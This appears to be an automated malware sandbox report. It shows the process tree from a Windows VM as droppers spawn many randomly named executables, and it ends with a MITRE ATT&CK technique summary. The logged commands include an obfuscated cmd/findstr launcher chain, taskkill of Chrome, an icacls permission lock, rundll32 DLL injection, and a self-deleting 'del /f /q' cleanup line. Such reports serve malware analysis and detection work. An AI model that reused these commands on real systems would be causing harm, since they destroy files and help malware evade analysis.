C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 2415⤵
- Program crash
PID:6996
-
-
-
-
C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe"C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe"13⤵PID:7300
-
C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exeC:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe14⤵PID:7688
-
-
C:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exeC:\Users\Admin\Documents\2ZvNUN_O2F7YJ7kDR1eZVEzZ.exe14⤵PID:6460
-
-
-
C:\Users\Admin\Documents\2Xdo_dS_MrBuN5kDAwQtGkkp.exe"C:\Users\Admin\Documents\2Xdo_dS_MrBuN5kDAwQtGkkp.exe"13⤵PID:7388
-
-
C:\Users\Admin\Documents\Jlsi5TCWKei2zzWobjWuNBeC.exe"C:\Users\Admin\Documents\Jlsi5TCWKei2zzWobjWuNBeC.exe"13⤵PID:5788
-
-
C:\Users\Admin\Documents\w38a3Rtetdf01FT0Ku4Bz5rN.exe"C:\Users\Admin\Documents\w38a3Rtetdf01FT0Ku4Bz5rN.exe"13⤵PID:1164
-
-
C:\Users\Admin\Documents\0UKCwLOyS3K9o_aEDhHmhkY8.exe"C:\Users\Admin\Documents\0UKCwLOyS3K9o_aEDhHmhkY8.exe"13⤵PID:7792
-
-
C:\Users\Admin\Documents\9Kg8Psa1EsXtdkXJSCPDPE3v.exe"C:\Users\Admin\Documents\9Kg8Psa1EsXtdkXJSCPDPE3v.exe"13⤵PID:7812
-
-
C:\Users\Admin\Documents\GmtVQj9llyQkfzzpPYjF5Qcc.exe"C:\Users\Admin\Documents\GmtVQj9llyQkfzzpPYjF5Qcc.exe"13⤵PID:1652
-
C:\Users\Admin\Documents\GmtVQj9llyQkfzzpPYjF5Qcc.exeC:\Users\Admin\Documents\GmtVQj9llyQkfzzpPYjF5Qcc.exe14⤵PID:7624
-
-
-
C:\Users\Admin\Documents\gEIrNmpvyfekMSYe8xlKCZ6I.exe"C:\Users\Admin\Documents\gEIrNmpvyfekMSYe8xlKCZ6I.exe"13⤵PID:4860
-
-
C:\Users\Admin\Documents\3PFKKLYITVndPyyDtRoMx_kp.exe"C:\Users\Admin\Documents\3PFKKLYITVndPyyDtRoMx_kp.exe"13⤵PID:4592
-
-
C:\Users\Admin\Documents\7ChTdDHphKgNG3p62kcMkRAo.exe"C:\Users\Admin\Documents\7ChTdDHphKgNG3p62kcMkRAo.exe"13⤵PID:7784
-
-
C:\Users\Admin\Documents\cGEOjDItnwOxoOA6GArDw2B0.exe"C:\Users\Admin\Documents\cGEOjDItnwOxoOA6GArDw2B0.exe"13⤵PID:7276
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_2.exe11⤵PID:6504
-
C:\Users\Admin\AppData\Local\Temp\7zSC7942356\karotima_2.exekarotima_2.exe12⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\7zSC7942356\karotima_2.exe"C:\Users\Admin\AppData\Local\Temp\7zSC7942356\karotima_2.exe" -a13⤵PID:6448
-
-
-
-
-
-
-
C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe"C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe"8⤵PID:6672
-
C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exeC:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe9⤵PID:6260
-
-
C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exeC:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe9⤵PID:6640
-
-
C:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exeC:\Users\Admin\Documents\QUZuoJvPQpfTPtsgdRXGL_o9.exe9⤵PID:6280
-
-
-
C:\Users\Admin\Documents\FUDoDKJXHaQ5ATI5bxFak5Pc.exe"C:\Users\Admin\Documents\FUDoDKJXHaQ5ATI5bxFak5Pc.exe"8⤵PID:6700
-
C:\Users\Admin\Documents\FUDoDKJXHaQ5ATI5bxFak5Pc.exeC:\Users\Admin\Documents\FUDoDKJXHaQ5ATI5bxFak5Pc.exe9⤵PID:7528
-
-
-
C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe"C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe"8⤵PID:6900
-
C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exeC:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe9⤵PID:5632
-
-
C:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exeC:\Users\Admin\Documents\GyOkYEGoLEeFaOco1WvIRGKr.exe9⤵PID:5588
-
-
-
C:\Users\Admin\Documents\8gyH0A2qynIGpf5tfIZSqFAb.exe"C:\Users\Admin\Documents\8gyH0A2qynIGpf5tfIZSqFAb.exe"8⤵PID:6940
-
C:\Users\Admin\Documents\8gyH0A2qynIGpf5tfIZSqFAb.exeC:\Users\Admin\Documents\8gyH0A2qynIGpf5tfIZSqFAb.exe9⤵PID:5200
-
-
-
C:\Users\Admin\Documents\p4woxWOt5KOlFg8eEc2oV1BL.exe"C:\Users\Admin\Documents\p4woxWOt5KOlFg8eEc2oV1BL.exe"8⤵PID:6228
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Sorrisi.tmp9⤵PID:5360
-
C:\Windows\SysWOW64\cmd.execmd10⤵PID:6856
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^yNFefWPitqXbQXexaaaweTJMeyyzoIKOZcrabptodYbHejNKUaJtRjoktSZpRcZcdpbxUJWpgpLtcwKPaxnPYFWNhRgFpV$" Sapete.tmp11⤵PID:7028
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Acre.exe.comAcre.exe.com k11⤵PID:5880
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 3011⤵
- Runs ping.exe
PID:6408
-
-
-
-
-
C:\Users\Admin\Documents\aw3ZgOXlsedA0VuSKsAhhs41.exe"C:\Users\Admin\Documents\aw3ZgOXlsedA0VuSKsAhhs41.exe"8⤵PID:5968
-
-
C:\Users\Admin\Documents\pDCEXYKVjtI3g8RX198dW2Dl.exe"C:\Users\Admin\Documents\pDCEXYKVjtI3g8RX198dW2Dl.exe"8⤵PID:6828
-
C:\Users\Admin\AppData\Roaming\3542680.exe"C:\Users\Admin\AppData\Roaming\3542680.exe"9⤵PID:2728
-
-
-
C:\Users\Admin\Documents\WJFSWHfcMSth1mIuNTrj4aP8.exe"C:\Users\Admin\Documents\WJFSWHfcMSth1mIuNTrj4aP8.exe"8⤵PID:5852
-
C:\Users\Admin\Documents\WJFSWHfcMSth1mIuNTrj4aP8.exeC:\Users\Admin\Documents\WJFSWHfcMSth1mIuNTrj4aP8.exe9⤵PID:7836
-
-
-
C:\Users\Admin\Documents\LFfeUx0cRVv8fTEkaItLFGnL.exe"C:\Users\Admin\Documents\LFfeUx0cRVv8fTEkaItLFGnL.exe"8⤵PID:4344
-
C:\Users\Admin\Documents\LFfeUx0cRVv8fTEkaItLFGnL.exe"C:\Users\Admin\Documents\LFfeUx0cRVv8fTEkaItLFGnL.exe" -a9⤵PID:7888
-
-
-
C:\Users\Admin\Documents\Tz4V5Kz5UmFWG_A8a0vI173w.exe"C:\Users\Admin\Documents\Tz4V5Kz5UmFWG_A8a0vI173w.exe"8⤵PID:5580
-
-
C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe"C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe"8⤵PID:5628
-
C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exeC:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe9⤵PID:6792
-
-
C:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exeC:\Users\Admin\Documents\gr5wtI5F6lx9Z1qc1An9Aa7d.exe9⤵PID:7424
-
-
-
C:\Users\Admin\Documents\ZxayKoVx0rcuNHEAPdoSKYrE.exe"C:\Users\Admin\Documents\ZxayKoVx0rcuNHEAPdoSKYrE.exe"8⤵PID:6692
-
C:\Users\Admin\Documents\ZxayKoVx0rcuNHEAPdoSKYrE.exe"C:\Users\Admin\Documents\ZxayKoVx0rcuNHEAPdoSKYrE.exe"9⤵PID:7652
-
-
-
C:\Users\Admin\Documents\1JXQAK8tHtRr0HFtdAPfLdh2.exe"C:\Users\Admin\Documents\1JXQAK8tHtRr0HFtdAPfLdh2.exe"8⤵PID:6892
-
-
C:\Users\Admin\Documents\mAmdHU8qRrZJXBVBTDbTKFIZ.exe"C:\Users\Admin\Documents\mAmdHU8qRrZJXBVBTDbTKFIZ.exe"8⤵PID:6060
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 6609⤵
- Program crash
PID:7916
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 6729⤵
- Program crash
PID:8092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 6849⤵
- Program crash
PID:7668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6060 -s 8169⤵
- Program crash
PID:4520
-
-
-
C:\Users\Admin\Documents\Ly5hqz2kUfaqNRsJHA_yne0k.exe"C:\Users\Admin\Documents\Ly5hqz2kUfaqNRsJHA_yne0k.exe"8⤵PID:6488
-
-
C:\Users\Admin\Documents\TOe42lSTeKDW3C3DCgq_IHGJ.exe"C:\Users\Admin\Documents\TOe42lSTeKDW3C3DCgq_IHGJ.exe"8⤵PID:7148
-
-
C:\Users\Admin\Documents\PqYuGq2xovVH86VGijaXWGXx.exe"C:\Users\Admin\Documents\PqYuGq2xovVH86VGijaXWGXx.exe"8⤵PID:7108
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c karotima_2.exe6⤵PID:3968
-
C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\karotima_2.exekarotima_2.exe7⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\karotima_2.exe"C:\Users\Admin\AppData\Local\Temp\7zS477F02B5\karotima_2.exe" -a8⤵PID:5724
-
-
-
-
-
-
-
C:\Users\Admin\Documents\0evkxxGDpJ9t_tofxo4TSlGo.exe"C:\Users\Admin\Documents\0evkxxGDpJ9t_tofxo4TSlGo.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4928
-
-
C:\Users\Admin\Documents\woxBH7Nr6giQWt9wnhy33pk6.exe"C:\Users\Admin\Documents\woxBH7Nr6giQWt9wnhy33pk6.exe"3⤵
- Executes dropped EXE
PID:1464 -
C:\Users\Admin\Documents\woxBH7Nr6giQWt9wnhy33pk6.exe"C:\Users\Admin\Documents\woxBH7Nr6giQWt9wnhy33pk6.exe"4⤵PID:6132
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1464 -s 7444⤵
- Program crash
PID:2716
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:4152
-
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:4240
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pub2.exe"C:\Users\Admin\AppData\Local\Temp\pub2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4304
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4668
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3112
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3660
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4456
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4532
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2816
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3976
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1168
-
C:\Users\Admin\AppData\Local\Temp\5D73.exeC:\Users\Admin\AppData\Local\Temp\5D73.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5520 -
C:\Users\Admin\AppData\Local\Temp\5D73.exeC:\Users\Admin\AppData\Local\Temp\5D73.exe2⤵
- Executes dropped EXE
PID:5548 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\13d0ca97-b0f8-44de-a3f1-0945e1d34d2a" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:4624
-
-
C:\Users\Admin\AppData\Local\Temp\5D73.exe"C:\Users\Admin\AppData\Local\Temp\5D73.exe" --Admin IsNotAutoStart IsNotTask3⤵PID:7148
-
C:\Users\Admin\AppData\Local\Temp\5D73.exe"C:\Users\Admin\AppData\Local\Temp\5D73.exe" --Admin IsNotAutoStart IsNotTask4⤵PID:6680
-
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:5432
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:5396 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:2368
-
-
C:\Users\Admin\AppData\Local\Temp\4EF.exeC:\Users\Admin\AppData\Local\Temp\4EF.exe1⤵PID:4616
-
C:\ProgramData\XC9MIXMEM7VWJW6X.exe"C:\ProgramData\XC9MIXMEM7VWJW6X.exe"2⤵PID:6784
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 4EF.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4EF.exe" & del C:\ProgramData\*.dll & exit2⤵PID:7616
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 4EF.exe /f3⤵
- Kills process with taskkill
PID:8144
-
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:4564 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:5040
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4824
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:6196
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:6648 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵PID:6452
-
-
C:\Users\Admin\AppData\Local\Temp\5590.exeC:\Users\Admin\AppData\Local\Temp\5590.exe1⤵PID:7080
Network
MITRE ATT&CK Enterprise v6
Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Modify Registry
2Virtualization/Sandbox Evasion
1Web Service
1